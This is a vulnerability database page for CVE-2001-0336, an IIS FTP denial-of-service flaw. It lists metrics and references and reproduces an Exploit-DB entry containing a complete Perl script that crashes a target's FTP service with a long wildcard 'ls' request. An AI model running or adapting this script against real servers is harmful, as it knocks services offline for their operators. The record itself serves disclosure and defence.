CVE-2001-0336 : Detail

CVE-2001-0336

0.38%V3
Network
2001-09-18
02h00 +00:00
2004-09-02
07h00 +00:00

CVE Descriptions

The Microsoft MS00-060 patch for IIS 5.0 and earlier introduces an error which allows attackers to cause a denial of service via a malformed request.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 20846

Publication date : 2000-05-13 22h00 +00:00
Author : Nelson Bunker
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2717/info

Due to a flaw in the pattern-matching function used by FTP commands, denial of service attacks can be successfully launched. If a user submits an FTP command along with a filename containing specially placed wildcard sequences, the pattern-matching function will not allocate sufficient memory, resulting in IIS experiencing a denial of service condition.

#!/usr/bin/perl
# Author: Nelson Bunker - Critical Watch
# http://www.criticalwatch.com
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026
# Tested against several servers. Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [[email protected]]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################

use Net::FTP;

$wildcard='*********************************************************************************************************';

if (not $ARGV[0]) {
    print qq~
Usage: wildcard_dos.pl <host>
~;
    exit;
}

$IPaddress= $ARGV[0];

$SIG {'PIPE'} = FoundIt;

# create new FTP connection w/5 second timeout
$ftp = Net::FTP->new($IPaddress, Timeout => 5);

if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}

if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on $IPaddress is unacceptable";}

$bogus = $ftp->ls($wildcard);

sub FoundIt
{
    print "This machine \($IPaddress\) is affected\n";
    exit(0);
}

Products Mentioned

Configuration 0

Microsoft >> Internet_information_server >> Version To (including) 5.0

References

http://www.osvdb.org/5693
Tags : vdb-entry, x_refsource_OSVDB